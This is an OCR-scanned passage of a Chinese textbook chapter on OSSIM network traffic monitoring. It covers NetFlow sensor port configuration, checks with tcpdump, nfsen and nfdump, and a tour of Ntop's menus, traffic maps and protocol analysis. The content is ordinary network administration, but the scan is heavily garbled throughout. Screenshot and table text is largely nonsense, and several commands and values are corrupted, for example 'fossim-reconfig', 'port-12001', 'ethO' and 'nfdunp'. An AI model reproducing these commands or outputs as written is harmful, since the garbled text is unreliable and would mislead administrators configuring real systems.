”Sensor 上 启用 NetFlow 服务 时 随机 分 配 的 ， 需 要 读者 将 Sensor IP 地 址 和 这 个 随机 分 配 的 
i 端口 号 的 对 应 关系 记 清楚 。 


OSSIM Server 端 是 否 收 到 这 些 数据 呢 ? 需要 用 如 下 命令 进行 验证 。 


#tcpdump -n udp port 12000 
#tcpdump -n udp port 12001 


如 果 系统 重启 ， 那 么 这 条 命令 又 需要 重新 输入 ， 这 是 我 们 可 以 分 别 修改 SensorA. B 上 的 


460 


第 8 章 OSSIM 流量 分 析 与 监控 


ossim setup.conf 配置 文件 。 
在 SensorA 上 操作 : 


#vi /etc/ossim/ossim setup.conf 


修改 第 55 fT NetFlow_remote_collector_port=555， 在 此 行 配置 中 将 555 默认 端口 修改 为 对 
应 的 netflow 发 送 端口 ， 以 SensorA 为 例 该 值 为 12000。 

为 了 使 其 生效 不 必 重 启 系统 ， 只 要 执行 以 下 命令 : 

fossim-reconfig 

在 SensorB 上 操作 : 

#vi /etc/ossim/ossim setup.conf 

修改 第 55 行 : 
netflow remote collector port-12001 

运行 以 下 命令 : 


#ossim-reconfig 


这 时 ， 系 统 会 自动 修改 /etc/default/fprobe 配置 文件 中 Flow. collector 的 端口 号 。 
为 了 确保 在 SensorA、SensorB 和 Sensor 上 都 能 展现 其 NetFlow 数据 ， 要 确保 nfsen 都 收 
到 数据 ， 我 们 在 Ossim Server 的 终端 控制 台 下 ， 操 作 以 下 命令 : 


VirtualUsMAllInone:~# nfsen -r live 
name live 

group (nogroup) 
tcreate Tue Mar 27 11:55:00 2012 
00 2015 


updated Thu Apr 30 16:20:00 2015 
expire 0 hours 

size 339.9 MB 

maxsize 0 


type live 

Wicked 0 

status OK 

version 130 

Channel 564D84303295CB66AE8A8141C00F6233 sign: + colour: $0000ff order: 1 sourcelist: 564DB430 
3295CB66AEBAB141C00F6233 Files: 1937 Size: 355409920 

channel CD8A4E605B144E4E99A03700D8EC7 3AA sign: + colour: #ff00ee order: 2 sourcelist: CD8A4E60 
8B144E4E99A03700DBEC7 3AA Files: 155 Size: 634880 

channel 73E61EF5D3C54168A8FE5561BF5E903B sign: + colour $8ff24e order: 3 sourcelist: 73E61EFS 
D3C54168A8FE55618F5E9038 Files: 82 Size: 335872 


在 输出 结果 中 ，“size” 的 值 代表 SensorA. SensorB 和 Sensor 三 个 传感器 发 送 采 样 数 据 
流 的 总 容量 。 

接着 观察 目录 的 内 容 , 我 们 进入 目录 564db4303295cb66ae828141c00f6233, 在 该 目录 下 有 
若干 Pcap 格式 的 文件 ， 每 隔 5 分 钟 生成 一 个 ， 每 个 文件 大 小 在 500KB~1000KB 大 小 并 不 固 
定 )， 每 天 会 产生 100-200MB 的 抓 包 文件 。 
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WITT A neon /Var each or dmb/ ows /ve 1s -1 

total 12 

drwxrwxr-x 3 www-data www-data 4096 Apr 30 17:05 564DB4303295CB66AE8A8141COOF6233 
drwxrwxr-x 3 www-data www-data 4096 Apr 30 17:05 73E61EF5D3C54168A8FE5561BF5E903B 
drwxrwxr-x 3 www-data www-data 4096 Apr 30 17:05 CD8A4E60BB144E4E99A03700D8EC7 3AA 
virtualusMAllrinone:/var /cache/nfdump/flows/lives J 


如 果 在 实验 中 发 现 没 有 收 到 Sensor 数据 包 ， 首 先 检查 设置 是 否 正 确 ， 接 下 来 用 tepdump 
来 抓 包 分 析 ， 具 体 抓 包 操作 如 下 所 示 。 


YiptualuswATlinone;-A ps aux. |grep fprobe 
root $051 0.0 0.0 6028 704 pts/4 S+ 17:26 0:00 grep --coloreauto fprobe 
root 15420 0.4 0.0 4/336 6456 Ss] 16:00 0:25 /usr/sbin/fprobe -iethO -fip 192.168.11.105:555 
VirtualusMAllinone:-& tcpdump -i ethO -n 'host 192.168.11.105 and port 555° 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listenjno on erho, Vink type ENIOMB (Ethernet), capture size 65535 bytes 

+ 553754 11.1 799 92. 


8. > 192.168.11.105. 555: 
151498 > 192.168.11.105 
.51498 > 192.168.11.105 
.49799 > 192.168.11.105 
.49799 > 192.168.11.105 
7.51498 > 192.168.11.105. 
.49799 > 192.168.11.105 
.49799 > 192.168.11.105 
.51498 » 192.168.11.105 
.49799 » 192.168.11.105 
.49799 > 192.168.11.105 
.51498 > 192.168.11.105 
.49799 » 192.168.11.105 
.49799 > 192.168.11.105 
.49799 » 192.168.11.105. 
.51498 > 192.168.11.105. 


或 tcpdump -ieth0 ‘port 12001" . 
通过 nfdump 可 以 实现 NetFlow 记录 的 过 滤 、Top 统计 和 排序 等 功能 , TE OSSIM 通过 Web 
UI 能 轻松 地 展现 给 用 户 ， 如 图 8-22 所 示 。 


BENE ww — cu 
otte: Ive 
w vor o» am Profile info: 
we — 
m pa 
pan Sap o6 2015 - oco toT 
Wel Sep 9 18:05:00 2005 Floww/s any protocol "sm — 2015-09-09-18-05 
* tend — 2015-09-09-19-05 
i $ 
E 
M seneor emn 
[154 
Quos Osace ca 
iis mun omm ws ie Graph 
X stansnes TES .OT se oo 215. i605 - 092035 - 1905 
c» v noe * mows X mre 
Sh Ey eda. dms ade a Ei die npe lens ah r3 r3 ime ome 
Bmoa iso O7 osh oza Ao  20ks NAA 265% 20ks OS  IXDMÜ ss IGON 229Mb/s 290E 
Qemei]p 22n osn dije osa as Fake mam MSI 7AM 27je  MO&bj 129M 476tble a29mb/e 0754 
Üiemerg n mwan nap ein 0076 mais man agan Iob DA 2HIMNA Seu/ OIM  2DOMN a1 
Tom — iis naa alis 66s Ds Al s 3997 SNS MINUS IESi  X3iMbs  12Mb/s 3058Mw/s 3278Mbls S3 


8-22 NetFlow 多 传感器 显示 


作为 系统 维护 人 员 需 要 了 解 后 台 执行 的 命令 ， 例 如 我 们 进入 2015-05-01 目录 ， 对 其 数据 
包 按 端口 排序 输入 命令 “nfdump -r nfcapd.201505010315 -s dstport -n 10". 
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Virtualus] rones /Var /cache/nf dunp/f Tous /1ive/561084303295CB66AE8A8141C00F6233/2015-05-01# nfdunp -r rfcapd, 201505010315 -5 dstport -n 10 
Top 10 ost Port ordered by f 


ost port, Flovs( Packets (%) Bytes pps bps bpp 


53 4. Bra 1.3) 0 1 ^ 
4672 268(13.0) 9245( 0.2) 1 49 3 
80 99( 4.8) 48593( 1. 2 0 1 124 
22 83( 4.0; 2.1 M(48.2 0 70 790 
8000 42€ 2.0; 730( 0.1. 0 0 63 
2L 206 n EEN 0.1, 0 0 59 
8080 40€ 1.9, 3360( 0.1 0 0 60 
5355 17 0,8) . 1700( 0.0) 0 o 350 
.666 ary 15000 11( 0.5) 390( 0. 0 26 30 
2015-05-01 03:17:35.517 236701.912 any 768 10( 0.5) 268( 1.7)  26112( 0.6) 0 0 9» 


Summary: tota] flows: 2068, total bytes: 4.3 M, tora] packets: 16014，avg bps: 145, avg pps: O, avg bpp: 269 
Tine window: 2015-05-01 03:13:30 - 1015-05-03 21:02:51 


ium vows S processed: 2068, Blocks ski ed: 0, DYES read: 107564 
lows/second: 0.0 wal S Foe / second: 1973282.4 
nm irona, Tar /cache/nfdunp loss /1i ve/3610B4305299CBG6AEBAS1AÍCO0F F6233/2015-05-01# 


#nfdump -R ./ -s dstport -n 10 
#nfdump -r nfcapd.201505011610 -n 10 -s proto 


OSSIM 流量 监控 工具 综合 应 用 


网 络 管理 中 除了 要 找 出 网 络 性 能 的 瓶颈 、 信 息 安全 防护 , 还 应 该 掌握 网 络 带宽 的 具体 使 用 
情况 ， 从 网 络 流量 的 变化 ， 能 够 发 现 异 常 行 为 。 当 某 PC 感染 病毒 时 ， 会 出 现 比 平常 高 出 许多 
倍 的 流量 ， 此 时 封锁 该 IP 的 联网 ， 才 能 阻止 病毒 继续 蔓延 。 

通过 长 期 流量 监控 , 可 以 使 我 们 能 建立 网 络 评价 基线 标准 , 某 个 时 段 对 主机 通信 流量 的 观 
察 ， 可 以 掌握 主机 在 不 同时 段 的 流量 值 ， 一 旦 收集 到 足够 多 的 数据 ， 就 可 建立 起 基线 标准 。 本 
节 重 点 讨论 如 何 使 用 OSSIM 下 的 Ntop 和 Nagios 这 两 款 流量 监控 工具 。 


8.4.1 Ntop 流量 采集 方式 

Ntop 与 一 些 基于 SNMP 来 获取 网 络 设备 的 端口 流量 不 同 ，Ntop 可 以 分 析 二 、 三 层 及 更 高 
层 流 量 。Ntop 还 能 根据 所 监测 网 络 特征 ， 灵 活 改 变 流量 采集 方法 ， 可 以 更 加 精准 地 采集 网 络 
流量 。 

(1) 当 监 测 一 个 网 段 的 流量 状况 ，Ntop 可 采用 基于 Sniffer 的 流量 采集 模式 ， 可 以 说 Ntop 
也 是 一 种 网 络 嗅 探 器 。 嗅 探 器 在 协助 监控 网 络 数据 传输 、 排 除 网 络 故 障 等 方面 有 着 其 他 工具 所 
不 可 替代 的 作用 。 

例如 , 发 现 疑似 网 络 攻击 行为 , 通过 嗅 探 器 截获 的 数据 包 可 以 确定 正在 攻击 系统 的 是 什么 
类 型 的 数据 包 以 及 它们 的 源头 ， 从 而 可 以 及 时 做 出 响应 ， 这 些 Ntop 独 有 的 特性 是 Cacti 以 及 
Zabbix 等 监控 工具 所 无 法 提供 的 。 


(2) 当 监 测 Cisco 路 由 器 交换 机 (它们 支持 NetFlow 流 ) 时 ， 可 以 通过 对 设备 配置 打开 采集 
网 络 数据 流 功能 ， 通 过 UDP 协议 ， 用 NetFlow 接收 流量 数据 ， 然 后 将 收集 的 数据 归档 。 
(3) H3C、HP ProCurve 2900, Foundry 设备 都 支持 sFlow 收集 网 络 流量 。 由 于 sFlow 被 
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部 署 在 交换 机 和 路 由 器 的 ASIC 中 , 所 以 属于 基于 硬件 的 流量 采集 技术 。 通 过 sFlow 对 网 络 进 
行 监控 将 不 需要 镜像 监控 端口 ， 这 样 就 节约 了 网 络 资源 消耗 。Ntop 这 里 就 相当 于 sFlow 收集 
器 ， 可 以 接收 sFlow agent 发 来 的 数据 流 。 


a sFlow 传输 协议 也 是 UDP， 端 口 为 6343。 | 


|: 


Ntop 需要 对 捕获 的 数据 包 进 行 实 时 、 快 速 分 类 ，Ntop 的 哈 希 算法 采用 了 散 列 算 法 的 基本 
思想 ，Ntop 的 数据 包 分 析 器 在 某 个 时 间 单 元 内 分 析 数 据 包 ， 它 根据 已 用 的 网 络 接口 对 数据 包 
的 头 部 信息 进行 分 析 。 而 各 个 主机 的 信息 被 存放 在 一 个 包含 计数 器 的 巨大 Hash 表 中 ， 这 些 计 
数 器 是 根据 相应 网 络 协议 生成 , 它们 通过 排序 号 的 主机 跟踪 数据 的 收发 。 由 于 我 们 不 能 预知 被 
控 主 机 的 数量 ，Ntop 有 可 能 占用 相当 数量 的 内 存 ， 因 此 Ntop 被 设计 为 定时 清空 主机 列表 ， 以 
防止 可 用 内 存 资源 被 耗 尽 ， 这 样 设计 还 防止 哈 希 表 过 于 庞大 。 


8.4.2. Ntop 监控 
在 OSSIM 系统 中 默认 集成 了 Ntop LA, Web 浏览 器 方式 查看 Ntop ， 启 动 方式 为 
Environment 一 Profiles, 打开 的 界面 如 图 8-23 所 示 。 


mroms CONFIGURATION 


PROFES. (5 


Global Traffic Statistics 


ere [nee samotno tare] au rente nt 
2» | «oo Jared o [imaj on 


n 


图 8-23 OSSIM 中 集成 的 Ntop 界面 
用 NTOP 进行 网 络 流量 分 析 查 询 的 过 程 中 ， 网 络 管理 员 可 以 查看 各 种 数据 统计 界面 ， 来 
对 流量 进行 分 析 ， 前 提 是 必须 在 交换 机 上 做 好 SPAN 设置 。Ntop 网 络 流量 分 析 功能 如 表 8-6 
所 示 。 


表 8-6 网 络 流量 分 析 功 能 菜单 说 明 


Summary Traffic 显示 网 卡 探测 的 所 有 流量 
Hosts 显示 主机 信息 ， 分 别 以 字 节 、 报 文 为 单位 显示 ， 同 时 又 可 以 基 
于 VLAN 查看 不 同 的 主机 信息 。 而 且 每 一 列 都 支持 排序 ， 方 便 
用 户 快速 查询 所 需 信 息 
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( 续 表 ) 


子 菜单 功 能 
Network Load | 显示 的 被 监控 接口 的 网 络 负载 
显示 网 络 流量 图 〈 细 分 为 区 域 地 图 和 主机 地 图 ) 
显示 Host Last Seen 插件 和 用 户 自 定义 的 规则 情况 


Network 
Flows 


All Protocols Traffic 包含 所 有 协议 的 网 络 流量 ， 以 及 所 有 主机 的 发 送 和 接收 报 文 情况 


Throughput “| 包含 所 有 协议 的 网 络 负载 情况 ， 包 括 所 有 主机 的 发 送 和 接收 报 文 情况 
Activity 包含 所 有 协议 的 网 络 活动 情况 


IP Summary 统 |Traffice， 能 显示 本 网 络 主机 和 远程 主机 发 送 和 接收 数据 的 信息 


计 各 应 用 层 |Multicast， 查 看 组 播 统 计 信息 

协议 信息 Internet Domains， 显 示 互 联网 域 统计 信息 
Networks， 显 示 当 前 监控 网 段 信息 

Ass， 显 示 自 治 域 信息 


Distribution， 显 示 本 地 、 远 程 到 本 地 、 远 程 的 流量 和 协议 分 布 
Traffic Local to local， 本 地 主机 流量 


Directions 记 |Local to remote， 本 地 到 远程 主机 的 IP 流量 
录 内 网 和 外 Remote to local， 远 程 到 本 地 的 主机 IP 流量 


网 各 个 流向 | 
的 流量 统计 |Remote to remote， 远 程 主机 之 间 的 人 P 流 量 


Local, 记录 本 |Routes， 本 地 子 网 路 由 信息 
地 的 端 口 |Ports Used， 本 地 主机 的 服务 端口 使 用 情况 


号 ，TCP 连接 |Active TCP/UDP Sessions， 活 动 TCP/UDP 会 话 


以 及 主机 操 Host Fingerprints， 主 机 指纹 
作 系统 信息 


Hosts Characterization， 主 机 特征 
Network Traffic Map， 本 地 网 络 中 主机 间 的 连接 图 
Traffic Matrix， 监 控 本 地 子 网 内 主机 之 间 的 流量 ， 以 表单 形式 给 出 统计 结果 。 网 
Utils RRD Alarm ”|RRD 配置 
Data Dump ”| 导出 数据 ， 提 供 把 网 络 中 各 主机 的 流量 通过 各 种 文档 格式 导出 ， 以 供 后 续 查 询 
使 用 


Ntop 本 地 主机 特征 子 项 及 含义 如 表 8-7 所 示 。 


表 8-7 Local Hosts Characterization (本 地 主机 特征 ) 


主机 信息 。 一 般 为 主机 的 IP 地址 (也 可 以 是 DNS 名 称 或 者 NetBios 等 ) ， 为 
Host 蓝 色 超 链接 形式 ， 可 以 通过 [Summary/Hosts] 菜 单项 对 应 页 面 ， 查 看 该 主机 记 
录 ， 单 击 此 主机 弹出 新 的 页 面 显 示 具 体 流量 统计 等 信息 
Unhealthy Host 服务 器 端的 主机 名 称 或 IP 地 址 
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( 续 表 ) 
L2 Switch Bridge 对 应 主机 是 否 为 2 层 设备 
Gateway 对 应 主机 是 否 为 网 关 
VoIP Host 是 否 为 VoIP 主机 
Printer 对 应 主机 是 否 为 打印 机 
NTP/DNS Server 对 应 主机 是 否 为 NTP/DNS Server 
SMTP/POP/IMAP Server ”| 对 应 主机 是 否 为 邮件 服务 器 
Directory/FTP/HTTP Server | 对 应 主机 是 否 为 Directory/FTP/HTTP Server 
DHCP/WINS Server 对 应 主机 是 否 为 DHCP/WINS Server 
DHCP Client 对 应 主机 是 否 为 DHCP Client 
P2P 是 否 为 P2P 服务 器 
Total 以 上 每 种 服务 器 的 数目 


Ntop 还 可 以 识别 本 地 主机 在 网 络 中 提供 的 服务 和 其 他 一 些 特征 ， 从 而 判断 这 些 主机 在 网 
络 中 担当 的 角色 。 如 图 8-24 所 示 ， 角 色 还 包括 存在 安全 隐患 的 主机 (包括 MAC 地 址 冲突 、 
使 用 的 端口 、 连 接 的 主机 连 超过 1024 等 情况 )， 图 中 列 出 了 每 种 图 标的 含义 。 
m 低 风险 e oos 


P 申 风险 Q Im Sorver 


e mn B par server 
Local Hosts Characterization 


mem 


10.32.14.252 PP 


824 本 地 主机 的 角色 


另外 还 有 一 些 重要 功能 ， 例 如 查看 本 地 子 网 路 由 信息 ， 如 图 8-25 所 示 。 查 看 本 地 各 主机 
特征 , 如 图 8-26 所 示 。 查 看 Netfows Flows 信息 (前 提 为 在 Ntop 中 设置 了 NetFlow), 如 图 8-27 
所 示 。 查 看 自治 区 的 信息 ， 如 图 8-28 所 示 。 列 出 流量 最 高 的 主机 ， 如 图 8-29 所 示 。 查 看 激活 
端口 ， 如 图 8-30 所 示 。 查 看 本 地 协议 使 用 情况 ， 如 图 8-31 所 示 。 
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图 8-30 ”查看 激活 端口 
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TCP/UDP: Local Protocol Usage 


Reporting on actual traffic for 8 host(s) on 5 service port(s) 


[service — ce — ] 


* pc1-36 [NetBIOS] 
een f> Sis bsc EN 
= | | 


。192.168.2.251 己 
* pc1-36 [NetBIOS] * pc1-36 [NetBIOS] 


* pc1-36 [NetBIOS] 
Mb dus SIE EE 


The color of the host link indicates how recently the host was FIRST seen 
Oto5minutes 5to 15 minutes 30 to 60 minutes 60+ minutes 


q 8-31 ”本 地 协议 使 用 情况 


Ntop 中 Data Dump 含义 如 表 8-8 所 示 。 


表 8-8 Data Dump 


所 有 主机 信息 

导出 各 个 主机 之 间 的 流量 情况 
导出 监控 接口 的 信息 

导出 已 经 配置 过 的 Network 信息 
对 Report Type 中 各 个 子 项 的 描述 
以 文本 格式 导出 相应 数据 
以 XML 格式 导出 相应 数据 
以 Perl 格式 导出 相应 数据 
以 PHP 格式 导出 相应 数据 
以 Python 格式 导出 相应 数据 

以 长 型 格式 导出 数据 ， 一 般 只 对 text 格 式 有 区 别 
以 短 型 格式 导出 数据 ， 一 般 只 对 text 格 式 有 区 别 
Ži "Dump Data ”按钮 导出 数据 


Hosts 

Report Hosts Matrix 
Type Network Interfaces 
Network Flows 


Description 


Format 


Action 


Attributes 
List 
Dump Data 


8.4.3 ”数据 大 小 分 析 

当前 网 络 中 日 益 盛行 的 碎片 攻击 和 超 长 数据 包 攻击 比较 常见 , 防范 困难 。 我 们 知道 在 以 大 
网 中 ， 数 据 包 的 长 度 在 64 一 1518 字 节 之 间 ， 多 数 是 几 百 字 节 。 所 以 ， 如 果 网 络 中 出 现 过 多 小 
于 等 于 64 字 节 或 大 于 等 于 1518 字 节 的 数据 包 , 表示 网 络 可 能 遭受 攻击 , 网 络 管理 人 员 应 立即 
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对 网 络 进行 检测 分 析 ， 以 确保 网 络 的 安全 。 

在 以 太 网 中 ， 如 果 数 据 包 小 于 64 字 节 ， 这 称 为 碎片 帧 , 大 于 1518 字 节 ， 称 为 巨人 帧 。 而 
碎片 和 巨人 帧 都 是 不 正常 的 数据 包 ， 它 们 若 大 量 存在 ， 将 影响 网 络 的 正常 运行 ， 比 如 过 多 的 碎 
片 将 增加 网 络 的 负载 , 过 多 特大 数据 包 导 致 网 络 瘫痪 等 。 为 避免 网 络 遭 受 碎片 或 特大 数据 包 的 
攻击 , 网 络 管理 人 员 应 该 对 网 络 中 传输 的 数据 包 进行 检查 分 类 统计 , 数据 包 分 类 如 表 8-9 所 示 。 


表 8-9 数据 包 分 类 显示 


名 称 大 小 或 比例 
Shortest 42 bytes 


Average Size 184 bytes 
Longest. 16-114 bytes 
Size <= 64 bytes 

64 < Size <= 128 bytes 

128 < Size <= 256 bytes 

256 < Size <= 512 bytes 

512 < Size <= 1024 bytes 

1024 < Size <= 1518 bytes 

Size > 1518 bytes 


8.4.4 流量 分 析 

NTOP 系统 中 ， 对 于 网 络 整体 流量 的 统计 ， 分 别 是 Protocol Traffic Counters, IP Traffic 
Counters, TCP/UDP Connections Stats, Active TCP Connections List, Peers List。 可 依 不 同 的 
Packet， 将 流量 数据 放 到 不 同 计算 器 中 。 对 网 络 整体 流量 进行 分 类 统计 ， 包 括 下 列 情形 : 


(1) 流量 分 布 : 区 分 为 本 网 络 主机 之 间 、 本 网 络 与 外 部 网 络 之 间 、 外 部 网 络 与 本 网 络 之 
间 的 网 络 流量 统计 ; 

(2) 数据 包 分 布 : 依据 数据 包 大 小 、 广 播 形态 和 分 类 及 统计 ; 

G) 协议 使 用 及 分 布 : 本 网 络 各 主机 传送 与 接收 数据 所 使 用 的 通信 协议 种 类 与 数据 传输 
量 。 另 外 ， 通 过 Summary Traffic 查看 整体 流量 ， 网 络 流量 会 清晰 地 显示 出 来 。 


1. 查看 通信 协议 


数据 包 形态 对 于 网 络 安全 分 析 具 有 至 关 重 要 的 意义 。 比 如 ， 网 络 中 最 常见 的 数据 包 既 有 
TCP 也 有 UDP 等 类 型 ， 如 果 想 了 解 某 台 计算 机 传输 了 哪些 数据 ， 可 以 双击 计算 机 名 称 即 可 分 
析出 用 户 各 种 网 络 传输 的 协议 类 型 和 占用 带宽 的 比例 。 当 发 生 异 常 ,通过 图 形 直观 地 展示 出 来 ， 
例如 在 出 现 蠕虫 攻击 时 会 出 现 异常 流量 ， 其 中 一 种 情况 如 图 8-32 所 示 。 
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Global Protocol Distribution 


[| 


a | 
ER 
C E — — — — —] 


[pner] reme ED 
uw — — —jesme 9 


图 8-32 发 生 异 常 流量 时 协议 分 布 
而 正常 工作 状态 下 的 协议 分 布 主要 是 TCP 协议 ， 如 图 8-33 所 示 。 


Global Protocol Distribution 


Protocol Percentage 


(R)ARP 
IPsec 


833 ”正常 流量 协议 分 布 


2. 查看 网 络 流量 图 ( Local Network Traffic Map ) 


Ntop 有 个 很 有 趣 的 功能 ， 它 能 够 动态 显示 网 络 数据 的 流量 及 流向 ， 要 实现 该 功能 ， 首 先 
选择 Ntop 菜单 中 Admin 一 configure 一 Preference, 配置 dot.path 的 参数 为 /usr/bin/dot, 如 图 8-34 
所 示 。 然 后 在 Ntop 菜单 中 依次 选择 了 P 一 Local 一 Network Traffic Map. 
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SERVICES GLOBAL THROUGHPU MATRIX 


SENSOR: [192.158.11.245 [SENSORI [v] INTERFACE: |erho| v] 
BY HOST: TOT 


Abot Somme Ales UP Use  Pupes D E 
= Configure #5 Serup Options 
[E woo mee. | uis 
Global Traffi 3 Reser sas 
Name [Device] Type [Sama Web Users 
eed aat 5 Protect URLs 
eno [ emo [emere a 
[ET 
= 


aal fe 


DASHBOARDS ANALYSIS 


^ 
| Session Creation vy 
[Session Deletion | 


[o 


l/usr/bin/dotl 


834 为 流量 向 图 设置 dot 路 径 


这 时 ， 可 看 到 一 张 反映 各 个 主机 流量 流向 的 拓扑 图 ,图 中 箭头 方向 代表 数据 的 流向 ， 鼠 标 
单 击 相应 IP 地 址 还 能 看 到 详细 的 IP 统计 信息 。 图 8-34 是 Ntop 根据 网 络 流量 情况 自动 生成 的 
拓扑 图 ， 此 图 为 系统 自动 生成 反映 了 数据 流向 ， 并 会 随 着 流量 变化 定时 更 新 。 

故障 举例 : 有 时 候 在 按 上 述 方法 设置 后 ， 查 看 Loca Network Traffic Map 时 ， 没 有 图 像 显 
示 , 而 出 现 了 一 行 提示 “Pleas enable make sure that the ntop html/ directory is properly installed”, 
同时 伴随 404 错误 及 “Autosuggest is already set!” 提 示 ， 大 家 可 以 尝试 以 下 方法 解决 : 

#chown -R ntop:ntop /var/lib/ntop/ 

#chown -R ntop:ntop /usr/share/ntop/ 

#ln -s /usr/share/ntop/html /var/lib/ntop/ 

#/etc/init.d/ntop restart 


A 服务 重启 完成 后 需要 等 待 几 分 钟 ， 不 要 立刻 打开 流向 图 观察 。 而 且 在 分 布 式 OSSIM 环境 
中 ， 具 有 多 个 Sensor 和 多 个 网 络 接口 ， 在 Ntop 界面 显示 中 和 修改 配置 文件 时 ， 一 定 要 区 
分 对 应 Sensor 下 的 网 卡 ， 切 勿 张冠李戴 ! 例如 在 图 8-34 中 ，Sensor 的 IP 地 址 为 
192.168.11.245, 那么 就 需要 在 这 人 台 主机 下 重 置 Ntop 的 密码 , 然后 进入 相应 的 Admin 参数 
配置 界面 。 
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图 8-35 反映 的 是 监控 网 段 192.168.11.0/24 中 客户 机 和 OSSIM (192.168.11.108) 交互 的 数 
据 流 向 。 
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图 8-35 简单 网 络 中 的 流向 图 


当 网 络 环境 比较 复杂 时 ， 这 种 图 像 会 变 得 很 复杂 ， 如 图 8-36 所 示 。 


Local Network Traffic Map 


mie 


7t 


masw 


er 


mass ě mewe mawa 


图 8-36 ”复杂 环境 中 的 流向 图 
Ntop 这 张 图 就 是 通过 开源 的 可 视 化 分 析 软 件 graphviz 实现 , 它 是 通过 digraph 绘制 的 一 种 
带 箭头 的 有 向 图 。Graphviz 提供 了 dot 语言 来 编写 绘图 脚本 。 当 设置 好 NTop 后 ， 这 张 图 保存 
fE/var/lib/ntop db 64/ 目 录 下 ， 文 件 名 为 network_map.png， 系 统 默认 120 刷新 一 次 ， 当 系统 受 
到 DOS 类 攻击 时 ， 这 张 图 会 密密麻麻 地 显示 着 IP 地 址 ， 图 片 尺 寸 也 会 很 大 。 
3. 查看 主机 流量 
在 得 知 网 络 整体 流量 信息 后 , 希望 深入 分 析 网 络 中 的 主机 流量 情况 ,从 而 进行 流量 限制 等 


方面 的 管理 工作 ， 我 们 可 在 Ntop 中 依次 选择 菜单 P 一 Summary 一 Traffic， 出 现 如 图 8-37 所 示 
界面 。 
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Network Traffic [TCPAP]: All Hosts - Data Sent+Received 


Hoss: Ai 
Sem Oniy 
Received Only. 
os [ewe om | [I wm | es [ree [wee | wn | sume | news [orcr-soom] wes 
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rtekiMactook Pro F ATA Movies |22 8%| 70 oves| 69 KBytes | 46:2 MBytes [256.7 Kbytes] DEC o| D D 342 9 
localhost P @ 34.5 Meytes [16.6 | 59.8 kbytes [17.5 Kevtes| 42.4 Kavies| 41.0 Koes| 0|s90 0 k&ves| 2.0 Mores| e| e| 0|22.6 Koves| 
localhost Fr 34.0 mayes] 675) Ea wzo[is3sKmyes| 623 wones| — 198| 15 Keves D 38i 6 [3 加 
19216&111 OP 6.9 MBytes| 13x [1103 KBytes|64.3 KBwtes| 2.3 MBytes| 1.5 ttes [1:1 KBtes| 161.5 KByres| 1.5 KBytes| 1.2 KBytes! 498| — 59 KBytes| 2.5 Koves] 5 
localhost 17 woves| 055) 362 494 362| 315 keves] 6| 15 oes 132| 12 keys] D [3 [3 
localhost 27 waves| 0.0%) o] D D o] o] o] o 9 9 o] o 


8-37 根据 协议 分 类 的 主机 流量 


8.4.5 ”协议 分 析 
Ntop 基于 嗅 探 模式 工作 除了 能 识别 2~3 层 信息 ,还 能 识别 应 用 层 协议 ,如 Web、Ftp、Samba、 
IRC 等 ， 如 图 8-38 所 示 ， 而 且 能 存储 长 达 一 年 的 数据 ， 如 图 8-39 所 示 。 


Accumulated Percentage / Historical Protocol View 
150 
$ am 
zon ss a 
- 00:00 92:00 04:00 06:00 08:00 10:00 
LESS Max: 69.8 Avg: 5.5 Last: 2.4 
O Anomalia WB Upper D Lower B Trend (30 min) B) 95th Percentile 
Bok 
79k 
w 60k 
nm Sok 
28.5 KBytes č 49k 
$ sok a 
20k 
Lok 
oo > 
00:00 92:00 9400 96:09 08:00 1500 
a Proxy Max: 25.8 Avg: 9.4 Last: 12.1 
O Anomalia B Upper D Lover B Trend (30 min) Bl 95th Percentile 
200 k 
* 050 
me 5.5 Mevtes| 1,919] ox| & 100k : 
MESES. N lulu i 
sok 
AJ 
* 00.00 02:00 04:00 06:00 08:00 10:00 
Hur Max: 226.9k Avg: 6.1k Last: 3.8k 
O Anomalia W Upper O Lower M Trend (30 min) B 95th Percentile 


838 识别 应 用 层 流 量 
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ntop RRD Graph 


From: |2015-05-01 22:16 | 加 To:|2015-05-02 10:16 ”| 国 | Update Graph 


Protocols: Historical View 


Last Half Hour 


Bit/s 


Last Week 
Last Month 
a Last 2 Months 


8 
8 
8 


Ma; 8. Last: 0.0 

Last 4 Months Ma: 46.7 Last: 49.9 
Ma; 44.3 Last: 19.4 
Ma; 12.5 Last: 1.5 
Ma; 1.7 Last: 768.0m 
Ma; 4.1 Last: 0.0 
Ma; 75.0 Last: 96.7 
Ma; 49.7k Last: 31.5k 
Ma; 3. Last: 0.0 
Ma; 12.6 Last: 1.6 
Ma; 253.5 Last: 112.4 
Ma; 247.9 Last: 37.8 
Ma; 25.3k Last: 25.2k 
Ma; 3.6 Last: 0.0 
Ma; 676.0 Last: 19.1 
Ma; 7.5k Last: 6.5k 
Ma; 20.1 Last: 0.0 
Ma; 8.2 Last: 4.8 


图 8-39 最 多 可 保存 一 年 的 应 用 层 流量 信息 


8.4.6 ”负载 分 析 

在 分 布 式 OSSIM 系统 中 ,通过 查看 不 同 的 Sensor， 并 选择 Summary 一 Network Load 菜单 
查看 监控 网 段 的 负载 情况 ， 包 括 历 史 负载 数据 的 查询 ， 都 能 通过 单 击 s 图 标 选择 相应 时 间 段 
即 可 实现 。 如 图 8-40 所 示 。 


PROFILES 
SERVICES GLOBAL THROUGHPUT MATRIX 
SENSOR: ETENEE EE INTERFACE: fetho[ v] BY HOST TOTAL | BY HOST: SENT | BY HOST 


192.168.11.207 [sensor3] 
192 168.11.105 [VirtualUSMAllInOne] 


Summary | All Protocols IP Utils Plugins Admin 


Traffic 


About 


Traffic Maps — » ntop RRD Graph 
Network Flows. Presets: | — V] From:[2015-05-0203:35 | Te:[2015-05-05 0345 “| 加 | Update Graph 
Throughput 
- = 二 -二 一 = 最. 
—— M 
i 
is 
03:40 03:45 
B Throughput Max: 3.6M Avg: 3.1M Last: 3.2M 
O Anomalia W Upper O Lover. MW Trend (30 min) Bl 95th Percentile 


8-40 不同 Sensor 下 的 负载 分 析 
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8.4.7 ”Ntop 应 用 于 网 络 视频 监视 

近年 来 使 用 迅雷 看 看 、PPS 等 在 线 视频 点 播 已 经 成 为 消耗 企业 网 络 带宽 的 主要 应 用 。 由 于 
这 些 主机 上 装 有 一 些 百度 、 迅雷 和 暴风 影音 的 插件 ， 在 内 网 连接 的 模式 下 ,这 些 插件 自动 与 外 
网 的 地 址 进行 连接 ， 在 域名 查询 的 时 候 ， 将 请 求 发 送 到 了 无 法 解析 外 网 地 址 的 内 网 DNS， 
